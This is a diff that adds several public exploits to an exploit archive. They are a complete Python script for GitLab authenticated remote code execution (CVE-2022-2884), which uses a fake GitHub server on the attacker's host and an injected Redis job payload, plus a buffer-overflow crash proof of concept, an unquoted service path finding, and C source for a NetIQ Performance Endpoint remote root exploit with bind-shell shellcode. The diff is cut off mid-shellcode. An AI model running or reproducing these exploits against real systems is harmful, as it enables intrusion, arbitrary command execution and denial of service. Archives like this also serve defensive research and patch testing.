+ required=True, + help="URL of the victim GitLab") + parser.add_argument("-pt", "--private-token", + required=True, + help="private token of GitLab") + parser.add_argument("-tn", "--target-namespace", + required=False, + default="root", + help="target namespace of GitLab (default is 'root')") + parser.add_argument("-a", "--address", + required=True, + help="IP address of the attacker machine") + parser.add_argument("-p", "--port", + required=False, + type=int, + default=1337, + help="TCP port of the attacker machine (default is 1337)") + parser.add_argument("-s", "--https", + action="store_true", + required=False, + default=False, + help="set if the attacker machine is exposed via HTTPS") + parser.add_argument("-c", "--command", + required=True, + help="the command to execute") + parser.add_argument("-d", "--delay", + type=float, + required=False, + help="seconds of delay to wait for the exploit to complete") + parser.add_argument("-v", "--verbose", + action="store_true", + required=False, + default=False, + help="verbose mode") + return parser.parse_args() + +def validate_input(args): + try: + validators.url(args.url) + except validators.ValidationFailure: + raise ValueError("Invalid target URL!") + + if len(args.private_token.strip()) < 1 and not args.private_token.strip().startswith("glpat-"): + raise ValueError("Invalid GitLab private token!") + + if len(args.target_namespace.strip()) < 1: + raise ValueError("Invalid GitLab target namespace!") + + try: + validators.ipv4(args.address) + except validators.ValidationFailure: + raise ValueError("Invalid attacker IP address!") + + if args.port < 1 or args.port > 65535: + raise ValueError("Invalid attacker TCP port!") + + if len(args.command.strip()) < 1: + raise ValueError("Invalid command!") + + if args.delay is not None and args.delay <= 0.0: + raise ValueError("Invalid delay!") + +def generate_random_string(length): + letters = string.ascii_lowercase + string.ascii_uppercase + string.digits + return ''.join(random.choice(letters) for i in range(length)) + +def generate_random_lowercase_string(length): + letters = string.ascii_lowercase + return ''.join(random.choice(letters) for i in range(length)) + +def generate_random_number(length): + letters = string.digits + result = "0" + while result.startswith("0"): + result = ''.join(random.choice(letters) for i in range(length)) + return result + +def base64encode(to_encode): + return base64.b64encode(to_encode.encode("ascii")).decode("ascii") + +def send_request(url, private_token, target_namespace, address, port, is_https, fake_repo_id): + logging.info("Sending request to target GitLab.") + protocol = "http" + if is_https: + protocol += "s" + headers = { + "Content-Type": "application/json", + "PRIVATE-TOKEN": private_token, + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" + } + fake_personal_access_token = "ghp_" + generate_random_string(36) + new_name = generate_random_lowercase_string(8) + logging.debug("Random generated parameters of the request:") + logging.debug(f" fake_repo_id = {fake_repo_id}") + logging.debug(f"fake_personal_access_token = {fake_personal_access_token}") + logging.debug(f" new_name = {new_name}") + payload = { + "personal_access_token": fake_personal_access_token, + "repo_id": fake_repo_id, + "target_namespace": target_namespace, + "new_name": new_name, + "github_hostname": f"{protocol}://{address}:{port}" + } + target_endpoint = f"{url}" + if not target_endpoint.endswith("/"): + target_endpoint = f"{target_endpoint}/" + target_endpoint = f"{target_endpoint}api/v4/import/github" + try: + r = requests.post(target_endpoint, headers=headers, json=payload) + logging.debug("Response:") + logging.debug(f"status_code = {r.status_code}") + logging.debug(f" text = {r.text}") + logging.info(f"Request sent to target GitLab (HTTP {r.status_code}).") + if r.status_code != 201: + logging.fatal("Wrong response received from the target GitLab.") + logging.debug(f" text = {r.text}") + raise Exception("Wrong response received from the target GitLab.") + except: + logging.fatal("Error in contacting the target GitLab.") + raise Exception("Error in contacting the target GitLab.") + +def is_server_alive(address, port, is_https): + protocol = "http" + if is_https: + protocol += "s" + try: + r = requests.get(f"{protocol}://{address}:{port}/") + if r.status_code == 200 and "The server is running." in r.text: + return True + else: + return False + except: + return False + +def start_fake_github_server(address, port, is_https, command, fake_repo_id): + app.config["address"] = address + app.config["port"] = port + protocol = "http" + if is_https: + protocol += "s" + app.config["attacker_server"] = f"{protocol}://{address}:{port}" + app.config["command"] = command + app.config["fake_user"] = generate_random_lowercase_string(8) + app.config["fake_user_id"] = generate_random_number(8) + app.config["fake_repo"] = generate_random_lowercase_string(8) + app.config["fake_repo_id"] = fake_repo_id + app.config["fake_issue_id"] = generate_random_number(9) + app.run("0.0.0.0", port) + +def encode_command(command): + encoded_command = "" + for c in command: + encoded_command += ("<< " + str(ord(c)) + ".chr ") + + encoded_command += "<<" + logging.debug(f"encoded_command = {encoded_command}") + return encoded_command + +def generate_rce_payload(command): + logging.debug("Crafting RCE payload:") + logging.debug(f" command = {command}") + encoded_command = encode_command(command) # Useful in order to prevent escaping hell... + rce_payload = f"lpush resque:gitlab:queue:system_hook_push \"{{\\\"class\\\":\\\"PagesWorker\\\",\\\"args\\\":[\\\"class_eval\\\",\\\"IO.read('| ' {encoded_command} ' ')\\\"], \\\"queue\\\":\\\"system_hook_push\\\"}}\"" + logging.debug(f" rce_payload = {rce_payload}") + return rce_payload + +def generate_user_response(attacker_server, fake_user, fake_user_id): + response = { + "avatar_url": f"{attacker_server}/avatars/{fake_user_id}", + "events_url": f"{attacker_server}/users/{fake_user}/events{{/privacy}}", + "followers_url": f"{attacker_server}/users/{fake_user}/followers", + "following_url": f"{attacker_server}/users/{fake_user}/following{{/other_user}}", + "gists_url": f"{attacker_server}/users/{fake_user}/gists{{/gist_id}}", + "gravatar_id": "", + "html_url": f"{attacker_server}/{fake_user}", + "id": int(fake_user_id), + "login": f"{fake_user}", + "node_id": base64encode(f"04:User{fake_user_id}"), + "organizations_url": f"{attacker_server}/users/{fake_user}/orgs", + "received_events_url": f"{attacker_server}/users/{fake_user}/received_events", + "repos_url": f"{attacker_server}/users/{fake_user}/repos", + "site_admin": False, + "starred_url": f"{attacker_server}/users/{fake_user}/starred{{/owner}}{{/repo}}", + "subscriptions_url": f"{attacker_server}/users/{fake_user}/subscriptions", + "type": "User", + "url": f"{attacker_server}/users/{fake_user}" + } + return response + +def generate_user_full_response(attacker_server, fake_user, fake_user_id): + partial = generate_user_response(attacker_server, fake_user, fake_user_id) + others = { + "bio": None, + "blog": "", + "company": None, + "created_at": "2020-08-21T14:35:46Z", + "email": None, + "followers": 2, + "following": 0, + "hireable": None, + "location": None, + "name": None, + "public_gists": 0, + "public_repos": 0, + "twitter_username": None, + "updated_at": "2022-08-08T12:11:40Z", + } + response = {**partial, **others} + return response + +def generate_repo_response(address, port, attacker_server, fake_user, fake_user_id, fake_repo, repo_id): + response = { + "allow_auto_merge": False, + "allow_forking": True, + "allow_merge_commit": True, + "allow_rebase_merge": True, + "allow_squash_merge": True, + "allow_update_branch": False, + "archive_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/{{archive_format}}{{/ref}}", + "archived": False, + "assignees_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/assignees{{/user}}", + "blobs_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/blobs{{/sha}}", + "branches_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/branches{{/branch}}", + "clone_url": f"{attacker_server}/{fake_user}/{fake_repo}.git", + "collaborators_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/collaborators{{/collaborator}}", + "comments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/comments{{/number}}", + "commits_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/commits{{/sha}}", + "compare_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/compare/{{base}}...{{head}}", + "contents_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/contents/{{+path}}", + "contributors_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/contributors", + "created_at": "2021-04-09T13:55:55Z", + "default_branch": "main", + "delete_branch_on_merge": False, + "deployments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/deployments", + "description": None, + "disabled": False, + "downloads_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/downloads", + "events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/events", + "fork": False, + "forks": 1, + "forks_count": 1, + "forks_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/forks", + "full_name": f"{fake_user}/{fake_repo}", + "git_commits_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/commits{{/sha}}", + "git_refs_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/refs{{/sha}}", + "git_tags_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/tags{{/sha}}", + "git_url": f"git://{address}:{port}/{fake_user}/{fake_repo}.git", + "has_downloads": True, + "has_issues": True, + "has_pages": False, + "has_projects": True, + "has_wiki": True, + "homepage": None, + "hooks_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/hooks", + "html_url": f"{attacker_server}/{fake_user}/{fake_repo}", + "id": int(repo_id), + "is_template": False, + "issue_comment_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/comments{{/number}}", + "issue_events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/events{{/number}}", + "issues_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues{{/number}}", + "keys_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/keys{{/key_id}}", + "labels_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/labels{{/name}}", + "language": "Python", + "languages_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/languages", + "license": None, + "merge_commit_message": "Message", + "merge_commit_title": "Title", + "merges_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/merges", + "milestones_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/milestones{{/number}}", + "mirror_url": None, + "name": f"{fake_repo}", + "network_count": 1, + "node_id": base64encode(f"010:Repository{repo_id}"), + "notifications_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/notifications{{?since,all,participating}}", + "open_issues": 4, + "open_issues_count": 4, + "owner": generate_user_response(attacker_server, fake_user, fake_user_id), + "permissions": { + "admin": True, + "maintain": True, + "pull": True, + "push": True, + "triage": True + }, + "private": True, + "pulls_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/pulls{{/number}}", + "pushed_at": "2022-08-14T15:36:21Z", + "releases_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/releases{{/id}}", + "size": 3802, + "squash_merge_commit_message": "Message", + "squash_merge_commit_title": "Title", + "ssh_url": f"git@{address}:{fake_user}/{fake_repo}.git", + "stargazers_count": 0, + "stargazers_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/stargazers", + "statuses_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/statuses/{{sha}}", + "subscribers_count": 1, + "subscribers_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/subscribers", + "subscription_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/subscription", + "svn_url": f"{attacker_server}/{fake_user}/{fake_repo}", + "tags_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/tags", + "teams_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/teams", + "temp_clone_token": generate_random_string(32), + "topics": [], + "trees_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/trees{{/sha}}", + "updated_at": "2022-06-10T15:12:53Z", + "url": f"{attacker_server}/repos/{fake_user}/{fake_repo}", + "use_squash_pr_title_as_default": False, + "visibility": "private", + "watchers": 0, + "watchers_count": 0, + "web_commit_signoff_required": False + } + return response + +def generate_issue_response(attacker_server, fake_user, fake_user_id, fake_repo, fake_issue_id, command): + rce_payload = generate_rce_payload(command) + response = [ + { + "active_lock_reason": None, + "assignee": None, + "assignees": [], + "author_association": "OWNER", + "body": "hn-issue description", + "closed_at": None, + "comments": 1, + "comments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/comments", + "created_at": "2021-07-23T13:16:55Z", + "events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/events", + "html_url": f"{attacker_server}/{fake_user}/{fake_repo}/issues/3", + "id": int(fake_issue_id), + "labels": [], + "labels_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/labels{{/name}}", + "locked": False, + "milestone": None, + "node_id": base64encode(f"05:Issue{fake_issue_id}"), + "_number": 1, + "number": {"to_s": {"bytesize": 2, "to_s": f"1234{rce_payload}" }}, + "performed_via_github_app": None, + "reactions": { + "+1": 0, + "-1": 0, + "confused": 0, + "eyes": 0, + "heart": 0, + "hooray": 0, + "laugh": 0, + "rocket": 0, + "total_count": 0, + "url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/reactions" + }, + "repository_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/test", + "state": "open", + "state_reason": None, + "timeline_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/timeline", + "title": f"{fake_repo}", + "updated_at": "2022-08-14T15:37:08Z", + "url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3", + "user": generate_user_response(attacker_server, fake_user, fake_user_id) + } + ] + return response + +@app.before_request +def received_request(): + logging.debug(f"Received request:") + logging.debug(f" url = {request.url}") + logging.debug(f"headers = {request.headers}") + +@app.after_request +def add_headers(response): + response.headers["content-type"] = "application/json; charset=utf-8" + response.headers["x-ratelimit-limit"] = "5000" + response.headers["x-ratelimit-remaining"] = "4991" + response.headers["x-ratelimit-reset"] = "1660136749" + response.headers["x-ratelimit-used"] = "9" + response.headers["x-ratelimit-resource"] = "core" + return response + +@app.route("/") +def index(): + return "The server is running." + +@app.route("/api/v3/rate_limit") +def api_rate_limit(): + response = { + "resources": { + "core": { + "limit": 5000, + "used": 9, + "remaining": 4991, + "reset": 1660136749 + }, + "search": { + "limit": 30, + "used": 0, + "remaining": 30, + "reset": 1660133589 + }, + "graphql": { + "limit": 5000, + "used": 0, + "remaining": 5000, + "reset": 1660137129 + }, + "integration_manifest": { + "limit": 5000, + "used": 0, + "remaining": 5000, + "reset": 1660137129 + }, + "source_import": { + "limit": 100, + "used": 0, + "remaining": 100, + "reset": 1660133589 + }, + "code_scanning_upload": { + "limit": 1000, + "used": 0, + "remaining": 1000, + "reset": 1660137129 + }, + "actions_runner_registration": { + "limit": 10000, + "used": 0, + "remaining": 10000, + "reset": 1660137129 + }, + "scim": { + "limit": 15000, + "used": 0, + "remaining": 15000, + "reset": 1660137129 + }, + "dependency_snapshots": { + "limit": 100, + "used": 0, + "remaining": 100, + "reset": 1660133589 + } + }, + "rate": { + "limit": 5000, + "used": 9, + "remaining": 4991, + "reset": 1660136749 + } + } + return response + +@app.route("/api/v3/repositories/") +@app.route("/repositories/") +def api_repositories_repo_id(repo_id: int): + address = current_app.config["address"] + port = current_app.config["port"] + attacker_server = current_app.config["attacker_server"] + fake_user = current_app.config["fake_user"] + fake_user_id = current_app.config["fake_user_id"] + fake_repo = current_app.config["fake_repo"] + response = generate_repo_response(address, port, attacker_server, fake_user, fake_user_id, fake_repo, repo_id) + return response + +@app.route("/api/v3/repos//") +def api_repositories_repo_user_repo(user: string, repo: string): + address = current_app.config["address"] + port = current_app.config["port"] + attacker_server = current_app.config["attacker_server"] + fake_user_id = current_app.config["fake_user_id"] + fake_repo_id = current_app.config["fake_repo_id"] + response = generate_repo_response(address, port, attacker_server, user, fake_user_id, repo, fake_repo_id) + return response + +@app.route("/api/v3/repos///issues") +def api_repositories_repo_user_repo_issues(user: string, repo: string): + attacker_server = current_app.config["attacker_server"] + fake_user_id = current_app.config["fake_user_id"] + fake_issue_id = current_app.config["fake_issue_id"] + command = current_app.config["command"] + response = generate_issue_response(attacker_server, user, fake_user_id, repo, fake_issue_id, command) + return response + +@app.route("/api/v3/users/") +def api_users_user(user: string): + attacker_server = current_app.config["attacker_server"] + fake_user_id = current_app.config["fake_user_id"] + response = generate_user_full_response(attacker_server, user, fake_user_id) + return response + +@app.route("//.git/HEAD") +@app.route("//.git/info/refs") +@app.route("//.wiki.git/HEAD") +@app.route("//.wiki.git/info/refs") +def empty_response(user: string, repo: string): + logging.debug("Empty string response.") + return "" + +# All the others/non-existing routes. +@app.route('/') +def catch_all(path): + logging.debug("Empty JSON array response.") + return [] + +def main(): + args = parse_arguments() + logging_level = DEFAULT_LOGGING_LEVEL + if args.verbose: + logging_level = logging.DEBUG + logging.basicConfig(level=logging_level, format="%(asctime)s - %(levelname)s - %(message)s") + + validate_input(args) + url = args.url.strip() + private_token = args.private_token.strip() + target_namespace = args.target_namespace.strip() + address = args.address.strip() + port = args.port + is_https = args.https + command = args.command.strip() + delay = args.delay + logging.info(f"Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. - {VERSION}") + logging.debug("Parameters:") + logging.debug(f" url = {url}") + logging.debug(f" private_token = {private_token}") + logging.debug(f"target_namespace = {target_namespace}") + logging.debug(f" address = {address}") + logging.debug(f" port = {port}") + logging.debug(f" is_https = {is_https}") + logging.debug(f" command = {command}") + logging.debug(f" delay = {delay}") + + fake_repo_id = generate_random_number(9) + + fake_github_server = Process(target=start_fake_github_server, args=(address, port, is_https, command, fake_repo_id)) + fake_github_server.start() + + logging.info("Waiting for the fake GitHub server to start.") + while not is_server_alive(address, port, is_https): + time.sleep(1) + logging.debug("Waiting for the fake GitHub server to start.") + logging.info("Fake GitHub server is running.") + + try: + send_request(url, private_token, target_namespace, address, port, is_https, fake_repo_id) + except: + logging.critical("Aborting the script.") + fake_github_server.kill() + sys.exit(1) + + if delay is not None: + logging.info(f"Waiting for {delay} seconds to let attack finish.") + time.sleep(delay) + else: + logging.info("Press Enter when the attack is finished.") + input() + + logging.debug("Stopping the fake GitHub server.") + fake_github_server.kill() + + logging.info("Closing the script.") + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/windows/dos/51196.txt b/exploits/windows/dos/51196.txt new file mode 100644 index 000000000..046eafa47 --- /dev/null +++ b/exploits/windows/dos/51196.txt @@ -0,0 +1,60 @@ +## Title: AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS) +## Author: nu11secur1ty +## Date: 01.05.2023 +## Vendor: https://aimone-video-converter.software.informer.com/, +http://www.aimonesoft.com/ +## Software: https://aimone-video-converter.software.informer.com/download/?ca85d0 +## Reference: + +## Description: +The AimOne Video Converter V2.04 Build 103 suffers from buffer +overflow and local Denial of Service. +The registration form is not working properly and crashes the video converter. +When the attacker decides to register the product. This can allow him +to easily crack the software and do more bad things it depending on +the case. + +## STATUS: HIGH Vulnerability - CRITICAL + +[+] Exploit: + +```Python +#!/usr/bin/python +# nu11secur1ty + +print("WELCOME to the AIMONE Video Converter 2.04 Build 103 - Buffer +Overflow exploit builder...\n") +input("Press any key to build the exploit...\n") +buffer = "\x41" * 7000 + +try: + f=open("PoC.txt","w") + print("[+] Creating %s bytes exploit payload.." %len(buffer)) + f.write(buffer) + f.close() + print("[+] The PoC file was created!") +except: + print("File cannot be created") +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/AimOne/AimOne-Video-Converter-V2.04-Build-103) + +## Proof and Exploit: +[href](https://streamable.com/v1hvbf) + +## Time spent +`00:35:00` + +## Writing an exploit +`00:15:00` + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html and https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/windows/local/51182.txt b/exploits/windows/local/51182.txt new file mode 100644 index 000000000..bca3c8fcf --- /dev/null +++ b/exploits/windows/local/51182.txt @@ -0,0 +1,28 @@ +# Exploit Title: Splashtop 8.71.12001.0 - Unquoted Service Path +# Date: 12/20/2022 +# Exploit Author: A.I. hernandez +# Version: 8.71.12001.0 +# Vendor Homepage: https://www.splashtop.com +# Version: current version +# Tested on: Windows 10 21H2 +# Step to discover Unquoted Service Path: + +C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ + +Splashtop Software Updater Service SSUService C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe + + Auto + +C:\>sc qc SSUService +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: SSUService + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 0 IGNORE + NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Splashtop Software Updater Service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/51199.c b/exploits/windows/local/51199.c new file mode 100644 index 000000000..fc9a613f5 --- /dev/null +++ b/exploits/windows/local/51199.c @@ -0,0 +1,801 @@ +/* +# Exploit Title: NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit +# Date: Jun 2007 +# Exploit Author: mu-b +# Vendor Homepage: https://www.microfocus.com/en-us/cyberres/identity-access-management +# Version: All +# Tested on: Windows / Solaris x86/SPARC +# CVE : 0day +* endpoint-pown-uni.c + * + * Copyright (c) 2007 by + * + * NetIQ Performance Endpoint <=5.1 remote root/SYSTEM exploit + * by mu-b - Jun 2007 + * + * $Id: endpoint-pown-uni.c 56 2021-04-23 10:15:49Z mu-b $ + * + * - Tested on: NetIQ Performance Endpoint 5.1.15750 (win32) + * (Revised: December, 2012) + * NetIQ Performance Endpoint 5.1.15541 (win32) + * (Revised: December, 2012) + * NetIQ Performance Endpoint 5.1.15368 (win32) + * (Revised: December, 2012) + * NetIQ Performance Endpoint 5.1 (win32) + * NetIQ Performance Endpoint 4.2 (freebsd-x86) + * NetIQ Performance Endpoint 5.1 (solaris-SPARC+noexec-stack) + * (Revised: May 23, 2006) + * + * + * "No executable code (like Java or Visual Basic) is sent. There is no way + * to do something like 'run this command.' 100,000’s of endpoints have been + * installed worldwide without incident." + * + * "Endpoints do rigorous internal validation. For example, endpoints are not + * susceptible to 'buffer overrun' attacks used by hackers." + * - https://tinyurl.com/lgmblyj + * + * - Private Source Code -DO NOT DISTRIBUTE - + * http://www.digit-labs.org/ -- Digit-Labs 2007!@$! + */ + +#include +#include + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define IPV4_BUFLEN 16 /* "255.255.255.255\0" */ + +#define PORT_SHELL 10000 +#define ENDPT_TCP_PORT 10115 +#define ENDPT_PKTMAX 0x1388 + +static char ppkt_buf1[] = + "\x06" /* ENDPT_COMMAND_SETUP_E1 */ + "\x07\x14\x43\x1A" /* verify_get_id (1) */ + "\x00\x22" /* copyright_smart_compare */ + "Copyright Ganymede Software Inc." + "\x00\x03" /* */ + "\xff" /* code_convert_from_line */ + "\x00\x03" /* */ + "\xff" /* code_convert_from_line */ + "\x00" /* */ + "\x00\x02" /* len < 0x80 */ + "\x00\x03" /* len < 0x40 */ + "\x00" /* len < 0x40 */ + "\x41\x41\x41\x41\x41\x41\x41\x41" /* */ + "\x41\x41\x41\x41\x41\x41\x41\x41" /* */ + "\x02" /* protocol */ + "\x00\x03" /* len < 0x40 */ + "\x00" /* */ + "\x00\x03" /* len < 0x40 */ + "\x00" /* */ + "\x00\x03" /* len < 0x40 */ + "\x00" /* */ + "\x00\x03" /* len < 0x40 */ + "\x00" /* */ + "\x41\x41\x41\x41\x41\x41" /* */ + "\x00\x00\x00\x01" /* */ + "\x00\x00\x00\x02" /* 218h */ + "\x00" /* */ + "\x01" /* 1ACh */ + "\x00\x00" /* */ + "\x00" /* 254h */ + "\x02" /* protocol */ + "\x00\x03" /* len < 0x40 */ + "\x00"; /* */ + +static char ppkt_buf1_end[] = + "\x00\x03" /* len < 0x40 */ + "\x00" /* */ + "\x00\x03" /* len < 0x40 */ + "\x00" /* */ + "\x00" /* */ + "\x00\x03" /* len < 0x40 */ + "\x00"; /* */ + +static char ppkt_buf2[] = + "\x06" /* ENDPT_COMMAND_SETUP_E1 */ + "\x07\x14\x43\x1A" /* verify_get_id (1) */ + "\x00\x22" /* copyright_smart_compare */ + "Copyright Ganymede Software Inc." + "\x00\x03" /* */ + "\xff" /* code_convert_from_line */ + "\x00\x03" /* */ + "\xff" /* code_convert_from_line */ + "\x02" /* protocol */ + "\x00\x03" /* len < 0x40 */ + "\x00" /* */ + "\x00\x03" /* len < 0x40 */ + "\x00" /* */ + "\x00\x03" /* len < 0x40 */ + "\x00" /* */ + "\x00\x03" /* len < 0x40 */ + "\x00" /* */ + "\x69" /* 210h */ + "\x00\x00\x00\x69" /* var_C */ + "\x00\x02" /* */ + "\x00\x00\x00\x69" /* var_C */ + "\x00\x00\x00\x69" /* 218h */ + "\x69" /* */ + "\x01" /* 1ACh */ + "\x00\x00" /* */ + "\x69" /* 254h */ + "\x02" /* protocol */ + "\x00\x03" /* len < 0x40 */ + "\x00"; /* */ + +static char ppkt_buf2_end[] = + "\x00\x03" /* len < 0x40 */ + "\x00" /* */ + "\x00\x03" /* len < 0x40 */ + "\x00" /* */ + "\x69" /* 0A8h */ + "\x00\x03" /* len < 0x40 */ + "\x00"; /* */ + +static char cpkt_buf1[] = + "\x07" + "AAAA"; + +static char cpkt_buf2[] = + "\x38" + "\x00\x04" + "AAAA"; + +static char x86_evil_len[] = + "\x11\xc0"; /* adc eax, eax */ + +#define X86_NOP_BYTE 0x90 /* nop */ + +static char sparc_evil_len[] = + "\x10\x80\x00\x3c"; /* ba */ + +static char sparc_nop[] = + "\x01\x00\x00\x00"; /* nop */ + +static char hammer_buf[] = + "\x00\x25\x38" + "\x00\x20" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00"; + +static char win32_x86_bind[] = + "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8e" + "\x2b\xb7\x2a\x83\xeb\xfc\xe2\xf4\x72\x41\x5c\x67\x66\xd2\x48\xd5" + "\x71\x4b\x3c\x46\xaa\x0f\x3c\x6f\xb2\xa0\xcb\x2f\xf6\x2a\x58\xa1" + "\xc1\x33\x3c\x75\xae\x2a\x5c\x63\x05\x1f\x3c\x2b\x60\x1a\x77\xb3" + "\x22\xaf\x77\x5e\x89\xea\x7d\x27\x8f\xe9\x5c\xde\xb5\x7f\x93\x02" + "\xfb\xce\x3c\x75\xaa\x2a\x5c\x4c\x05\x27\xfc\xa1\xd1\x37\xb6\xc1" + "\x8d\x07\x3c\xa3\xe2\x0f\xab\x4b\x4d\x1a\x6c\x4e\x05\x68\x87\xa1" + "\xce\x27\x3c\x5a\x92\x86\x3c\x6a\x86\x75\xdf\xa4\xc0\x25\x5b\x7a" + "\x71\xfd\xd1\x79\xe8\x43\x84\x18\xe6\x5c\xc4\x18\xd1\x7f\x48\xfa" + "\xe6\xe0\x5a\xd6\xb5\x7b\x48\xfc\xd1\xa2\x52\x4c\x0f\xc6\xbf\x28" + "\xdb\x41\xb5\xd5\x5e\x43\x6e\x23\x7b\x86\xe0\xd5\x58\x78\xe4\x79" + "\xdd\x78\xf4\x79\xcd\x78\x48\xfa\xe8\x43\x90\x3a\xe8\x78\x3e\xcb" + "\x1b\x43\x13\x30\xfe\xec\xe0\xd5\x58\x41\xa7\x7b\xdb\xd4\x67\x42" + "\x2a\x86\x99\xc3\xd9\xd4\x61\x79\xdb\xd4\x67\x42\x6b\x62\x31\x63" + "\xd9\xd4\x61\x7a\xda\x7f\xe2\xd5\x5e\xb8\xdf\xcd\xf7\xed\xce\x7d" + "\x71\xfd\xe2\xd5\x5e\x4d\xdd\x4e\xe8\x43\xd4\x47\x07\xce\xdd\x7a" + "\xd7\x02\x7b\xa3\x69\x41\xf3\xa3\x6c\x1a\x77\xd9\x24\xd5\xf5\x07" + "\x70\x69\x9b\xb9\x03\x51\x8f\x81\x25\x80\xdf\x58\x70\x98\xa1\xd5" + "\xfb\x6f\x48\xfc\xd5\x7c\xe5\x7b\xdf\x7a\xdd\x2b\xdf\x7a\xe2\x7b" + "\x71\xfb\xdf\x87\x57\x2e\x79\x79\x71\xfd\xdd\xd5\x71\x1c\x48\xfa" + "\x05\x7c\x4b\xa9\x4a\x4f\x48\xfc\xdc\xd4\x67\x42\x61\xe5\x57\x4a" + "\xdd\xd4\x61\xd5\x5e\x2b\xb7\x2a"; + +static char freebsd_x86_bind[] = + "\x6a\x61\x58\x99\x52\x68\x10\x02\x27\x10\x89\xe1\x52\x42\x52\x42" + "\x52\x6a\x10\xcd\x80\x99\x93\x51\x53\x52\x6a\x68\x58\xcd\x80\xb0" + "\x6a\xcd\x80\x52\x53\x52\xb0\x1e\xcd\x80\x97\x6a\x02\x59\x6a\x5a" + "\x58\x51\x57\x51\xcd\x80\x49\x79\xf5\x50\x68\x2f\x2f\x73\x68\x68" + "\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80"; + +static char solaris_sparc_bind[] = + "\x9c\x2b\xa0\x07\x98\x10\x20\x01\x96\x1a\xc0\x0b\x94\x1a\xc0\x0b" + "\x92\x10\x20\x02\x90\x10\x20\x02\x82\x10\x20\xe6\x91\xd0\x20\x08" + "\xd0\x23\xbf\xf8\x21\x00\x00\x89\xa0\x14\x23\x10\xe0\x23\xbf\xf0" + "\xc0\x23\xbf\xf4\x92\x23\xa0\x10\x94\x10\x20\x10\x82\x10\x20\xe8" + "\x91\xd0\x20\x08\xd0\x03\xbf\xf8\x92\x10\x20\x01\x82\x10\x20\xe9" + "\x91\xd0\x20\x08\xd0\x03\xbf\xf8\x92\x1a\x40\x09\x94\x12\x40\x09" + "\x82\x10\x20\xea\x91\xd0\x20\x08\xd0\x23\xbf\xf8\x94\x10\x20\x03" + "\x92\x10\x20\x09\x94\xa2\xa0\x01\x82\x10\x20\x3e\x91\xd0\x20\x08" + 